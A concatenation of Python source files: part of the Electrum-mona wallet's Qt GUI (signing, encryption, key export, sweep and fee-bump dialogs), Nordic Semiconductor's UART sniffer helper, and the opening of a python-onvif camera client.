vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt) -> Optional[Transaction]:
from electrum_mona.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_mona import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("monacoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_mona import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-mona-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
#if is_final:
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
UART.py
|
# Copyright (c) 2017, Nordic Semiconductor ASA
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. Neither the name of Nordic Semiconductor ASA nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NORDIC
# SEMICONDUCTOR ASA OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
import collections
import logging
import serial
from threading import Thread, Event
import serial.tools.list_ports as list_ports
import Exceptions
import Packet
SNIFFER_OLD_DEFAULT_BAUDRATE = 460800
# Baudrates that should be tried (add more if required)
SNIFFER_BAUDRATES = [1000000, 460800]
def find_sniffer(write_data=False):
open_ports = list_ports.comports()
sniffers = []
for port in [x.device for x in open_ports]:
for rate in SNIFFER_BAUDRATES:
reader = None
try:
reader = Packet.PacketReader(portnum=port, baudrate=rate)
try:
if write_data:
reader.sendPingReq()
_ = reader.decodeFromSLIP(0.1, complete_timeout=0.1)
else:
_ = reader.decodeFromSLIP(0.3, complete_timeout=0.3)
# FIXME: Should add the baud rate here, but that will be a breaking change
sniffers.append(port.encode('ascii', 'ignore'))
break
except (Exceptions.SnifferTimeout, Exceptions.UARTPacketError):
pass
except (serial.SerialException, ValueError):
continue
finally:
if reader is not None:
reader.doExit()
return sniffers
def find_sniffer_baudrates(port):
for rate in SNIFFER_BAUDRATES:
reader = None
try:
reader = Packet.PacketReader(portnum=port, baudrate=rate)
try:
reader.sendPingReq()
_ = reader.decodeFromSLIP(0.1, complete_timeout=0.1)
# TODO: possibly include additional rates based on protocol version
return {"default": rate, "other": []}
except (Exceptions.SnifferTimeout, Exceptions.UARTPacketError):
pass
finally:
if reader is not None:
reader.doExit()
return None
class Uart:
def __init__(self, portnum=None, baudrate=None):
self.ser = None
try:
if baudrate is not None and baudrate not in SNIFFER_BAUDRATES:
raise Exception("Invalid baudrate: " + str(baudrate))
self.ser = serial.Serial(
port=portnum,
baudrate=9600,
rtscts=True
)
self.ser.baudrate = baudrate
except Exception as e:
if self.ser:
self.ser.close()
self.ser = None
raise
self.read_queue = collections.deque()
self.read_queue_has_data = Event()
self.worker_thread = Thread(target=self._read_worker)
self.reading = True
self.worker_thread.setDaemon(True)
self.worker_thread.start()
def _read_worker(self):
self.ser.reset_input_buffer()
while self.reading:
try:
# Read any data available, or wait for at least one byte
data_read = self.ser.read(self.ser.in_waiting or 1)
self._read_queue_extend(data_read)
except serial.SerialException as e:
logging.info("Unable to read UART: %s" % e)
self.reading = False
return
def close(self):
if self.ser:
logging.info("closing UART")
self.reading = False
# Wake any threads waiting on the queue
self.read_queue_has_data.set()
if hasattr(self.ser, "cancel_read"):
self.ser.cancel_read()
self.worker_thread.join()
self.ser.close()
else:
self.ser.close()
self.worker_thread.join()
self.ser = None
def __del__(self):
self.close()
def switchBaudRate(self, newBaudRate):
self.ser.baudrate = newBaudRate
def readByte(self, timeout=None):
return self._read_queue_get(timeout)
def writeList(self, array):
try:
self.ser.write(array)
except serial.SerialTimeoutException:
logging.info("Got write timeout, ignoring error")
except serial.SerialException as e:
self.ser.close()
raise e
def _read_queue_extend(self, data):
if len(data) > 0:
self.read_queue.extend(data)
self.read_queue_has_data.set()
def _read_queue_get(self, timeout=None):
data = None
if self.read_queue_has_data.wait(timeout):
self.read_queue_has_data.clear()
try:
data = self.read_queue.popleft()
except IndexError:
# This will happen when the class is destroyed
return None
if len(self.read_queue) > 0:
self.read_queue_has_data.set()
return data
def list_serial_ports():
# Scan for available ports.
return list_ports.comports()
# Convert a list of ints (bytes) into an ASCII string
def listToString(list):
str = ""
for i in list:
str+=chr(i)
return str
# Convert an ASCII string into a list of ints (bytes)
def stringToList(str):
lst = []
for c in str:
lst += [ord(c)]
return lst
if __name__ == "__main__":
import time
t_start = time.time()
s = find_sniffer()
tn = time.time()
print s
print "find_sniffer took %f seconds" % (tn - t_start)
for p in s:
t = time.time()
print find_sniffer_baudrates(p)
tn = time.time()
print "find_sniffer_baudrate took %f seconds" % (tn - t)
tn = time.time()
print "total runtime %f" % (tn - t_start)
|
client.py
|
from __future__ import print_function, division
__version__ = '0.0.1'
import datetime as dt
import logging
import os.path
from threading import Thread, RLock
from zeep.client import Client, CachingClient, Settings
from zeep.wsse.username import UsernameToken
import zeep.helpers
from onvif.exceptions import ONVIFError
from onvif.definition import SERVICES
logger = logging.getLogger('onvif')
logging.basicConfig(level=logging.INFO)
logging.getLogger('zeep.client').setLevel(logging.CRITICAL)
import zeep
def zeep_pythonvalue(self, xmlvalue):
return xmlvalue
zeep.xsd.simple.AnySimpleType.pythonvalue = zeep_pythonvalue
# Ensure methods to raise an ONVIFError Exception
# when some thing was wrong
def safe_func(func):
def wrapped(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as err:
raise ONVIFError(err)
return wrapped
class UsernameDigestTokenDtDiff(UsernameToken):
"""
UsernameDigestToken class, with a time offset parameter that can be adjusted;
This allows authentication on cameras without being time synchronized.
Please note that using NTP on both end is the recommended solution,
this should only be used in "safe" environments.
"""
def __init__(self, user, passw, dt_diff=None, **kwargs):
super().__init__(user, passw, **kwargs)
self.dt_diff = dt_diff # Date/time difference in datetime.timedelta
def apply(self, envelope, headers):
old_created = self.created
if self.created is None:
self.created = dt.datetime.utcnow()
if self.dt_diff is not None:
self.created += self.dt_diff
result = super().apply(envelope, headers)
self.created = old_created
return result
class ONVIFService(object):
"""
Python Implemention for ONVIF Service.
Services List:
DeviceMgmt DeviceIO Event AnalyticsDevice Display Imaging Media
PTZ Receiver RemoteDiscovery Recording Replay Search Extension
>>> from onvif import ONVIFService
>>> device_service = ONVIFService('http://192.168.0.112/onvif/device_service',
... 'admin', 'foscam',
... '/etc/onvif/wsdl/devicemgmt.wsdl')
>>> ret = device_service.GetHostname()
>>> print ret.FromDHCP
>>> print ret.Name
>>> device_service.SetHostname(dict(Name='newhostname'))
>>> ret = device_service.GetSystemDateAndTime()
>>> print ret.DaylightSavings
>>> print ret.TimeZone
>>> dict_ret = device_service.to_dict(ret)
>>> print dict_ret['TimeZone']
There are two ways to pass parameter to services methods
1. Dict
params = {'Name': 'NewHostName'}
device_service.SetHostname(params)
2. Type Instance
params = device_service.create_type('SetHostname')
params.Hostname = 'NewHostName'
device_service.SetHostname(params)
"""
@safe_func
def __init__(self, xaddr, user, passwd, url,
encrypt=True, daemon=False, zeep_client=None, no_cache=False,
dt_diff=None, binding_name='', transport=None):
if not os.path.isfile(url):
raise ONVIFError('%s doesn`t exist!' % url)
self.url = url
self.xaddr = xaddr
wsse = UsernameDigestTokenDtDiff(user, passwd, dt_diff=dt_diff, use_digest=encrypt)
# Create soap client
if not zeep_client:
ClientType = Client if no_cache else CachingClient
settings = Settings()
settings.strict = False
settings.xml_huge_tree = True
self.zeep_client = ClientType(wsdl=url, wsse=wsse, transport=transport, settings=settings)
else:
self.zeep_client = zeep_client
self.ws_client = self.zeep_client.create_service(binding_name, self.xaddr)
# Set soap header for authentication
self.user = user
self.passwd = passwd
# Indicate wether password digest is needed
self.encrypt = encrypt
self.daemon = daemon
self.dt_diff = dt_diff
self.create_type = lambda x: self.zeep_client.get_element('ns0:' + x)()
@classmethod
@safe_func
